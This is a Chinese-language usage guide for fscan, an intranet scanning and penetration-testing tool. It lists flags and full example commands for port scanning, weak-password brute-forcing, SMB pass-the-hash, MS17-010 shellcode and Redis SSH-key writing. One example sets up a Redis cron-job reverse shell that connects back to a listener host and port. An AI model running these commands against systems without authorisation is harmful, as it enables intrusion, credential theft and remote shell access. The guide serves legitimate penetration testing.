简介
Fscan一款内网综合扫描工具,方便一键自动化、全方位漏洞扫描。支持主机存活探测、端口扫描、常见服务的爆破、MS17010、Redis批量写公钥、计划任务反弹Shell、读取Win网卡信息、Web指纹识别、Web漏洞扫描、NetBios探测、域控识别等功能
仓库地址:https://github.com/shadow1ng/fscan
使用教程
./fscan -h 192.168.1.1/24 -p 22,80,3306,6379,9200 -o result.txt
参数说明
参数 | 说明 | 示例 |
---|---|---|
-h | 指定目标主机或 IP 范围,支持单个 IP、IP 段、CIDR 格式 | -h 192.168.1.1/24 |
-f | 从文件读取目标列表 | -f ip.txt |
-p | 指定端口,多个端口用逗号分隔 | -p 80,443,3389 |
-noping | 不进行 ping 探测,直接扫描主机 | -noping |
-s | 启用端口指纹识别(服务 banner) | -s |
-http | 启用 Web 指纹识别(CMS、标题、响应) | -http |
-vul | 扫描常见漏洞 | -vul |
-m | 指定爆破模块,支持 ssh、ftp、mysql、mssql、rdp 等 | -m ssh,mysql |
-user | 指定爆破使用的用户名(可配合爆破模块使用) | -user admin |
-pwd | 指定爆破使用的密码(或配合弱口令扫描) | -pwd 123456 |
-t | 设置扫描线程数,默认100 | -t 1000 |
-time | 设置网络超时时间(单位:秒) | -time 3 |
-o | 指定扫描结果输出文件 | -o result.txt |
综合使用
参数 | 参数所属大类 | 说明 | 示例 |
---|---|---|---|
-h | 目标指定 | 指定目标 IP,支持单IP、段、CIDR | fscan.exe -h 192.168.1.1/24 |
-hf | 目标指定 | 从文件读取目标列表 | fscan.exe -hf ip.txt |
-hn | 目标指定 | 排除某些主机或网段 | fscan.exe -h 192.168.1.1/24 -hn 192.168.1.5 |
-np | 扫描控制 | 不进行存活检测(跳过 ping) | fscan.exe -h 192.168.1.1/24 -np |
-t | 性能设置 | 设置线程数(默认600) | fscan.exe -h 192.168.1.1/24 -t 1000 |
-time | 性能设置 | 设置超时时间(秒) | fscan.exe -h 192.168.1.1/24 -time 5 |
-pa | 端口设置 | 追加端口扫描 | fscan.exe -h 192.168.1.1/24 -pa 3389 |
-pn | 端口设置 | 排除端口 | fscan.exe -h 192.168.1.1/24 -pn 445 |
-m | 模块选择 | 指定扫描模块(如 ssh、mysql、smb) | fscan.exe -h 192.168.1.1/24 -m ssh |
-p | 端口设置 | 指定端口 | fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 |
-user | 爆破参数 | 指定用户名 | fscan.exe -h 192.168.1.1/24 -user admin |
-pwd | 爆破参数 | 指定密码 | fscan.exe -h 192.168.1.1/24 -pwd 123456 |
-userf | 爆破参数 | 从文件读取用户名 | fscan.exe -h 192.168.1.1/24 -userf users.txt |
-pwdf | 爆破参数 | 从文件读取密码 | fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt |
-usera | 爆破参数 | 添加默认用户名 | fscan.exe -h 192.168.1.1/24 -usera root |
-pwda | 爆破参数 | 添加默认密码 | fscan.exe -h 192.168.1.1/24 -pwda 123456 |
-nobr | 扫描控制 | 禁止密码爆破 | fscan.exe -h 192.168.1.1/24 -nobr |
-br | 爆破参数 | 爆破线程数 | fscan.exe -h 192.168.1.1/24 -br 10 |
-hash | 爆破参数 | NTLM hash 用于 SMB PTH 攻击 | fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxx |
-nopoc | 扫描控制 | 禁用 Web 漏洞 POC 扫描 | fscan.exe -h 192.168.1.1/24 -nopoc |
-pocname | 漏洞扫描 | 指定包含关键词的 POC | fscan.exe -h 192.168.1.1/24 -pocname weblogic |
-pocpath | 漏洞扫描 | 指定 POC 文件路径 | fscan.exe -h 192.168.1.1/24 -pocpath ./pocs |
-full | 漏洞扫描 | 全部内置 POC 扫描 | fscan.exe -h 192.168.1.1/24 -full |
-cookie | 漏洞扫描 | 设置漏洞扫描 Cookie | fscan.exe -h 192.168.1.1/24 -cookie rememberMe=1 |
-proxy | 网络代理 | 设置 HTTP 代理 | fscan.exe -h 192.168.1.1/24 -proxy http://127.0.0.1:8080 |
-dns | 漏洞扫描 | 使用 DNSLOG 类型 POC | fscan.exe -h 192.168.1.1/24 -dns |
-rf | 利用模块 | Redis 写 SSH 公钥 | fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub |
-rs | 利用模块 | Redis 写入计划任务反弹 Shell | fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 |
-c | 利用模块 | 爆破成功后执行命令(SSH/WMI) | fscan.exe -h 192.168.1.1/24 -m ssh -c whoami |
-sc | 利用模块 | ms17010 相关 shellcode利用 | fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add |
-wmi | 利用模块 | 启动 WMI 扫描 | fscan.exe -h 192.168.1.1/24 -wmi |
-u | 目标指定 | 扫描单个 URL | fscan.exe -u http://example.com |
-uf | 目标指定 | 从文件读取 URL 列表 | fscan.exe -uf urls.txt |
-socks5 | 网络代理 | 设置 SOCKS5 代理 | fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 |
-o | 输出控制 | 指定输出文件路径 | fscan.exe -h 192.168.1.1/24 -o result.txt |
-json | 输出控制 | JSON 格式输出 | fscan.exe -h 192.168.1.1/24 -json |
-nocolor | 输出控制 | 关闭彩色输出 | fscan.exe -h 192.168.1.1/24 -nocolor |
组合实战示例:
快速扫描+弱口令+输出结果
fscan.exe -h 192.168.1.1/24 -pwd -o result.txt
Redis反弹Shell:
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666
Socks5代理支持扫描:
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080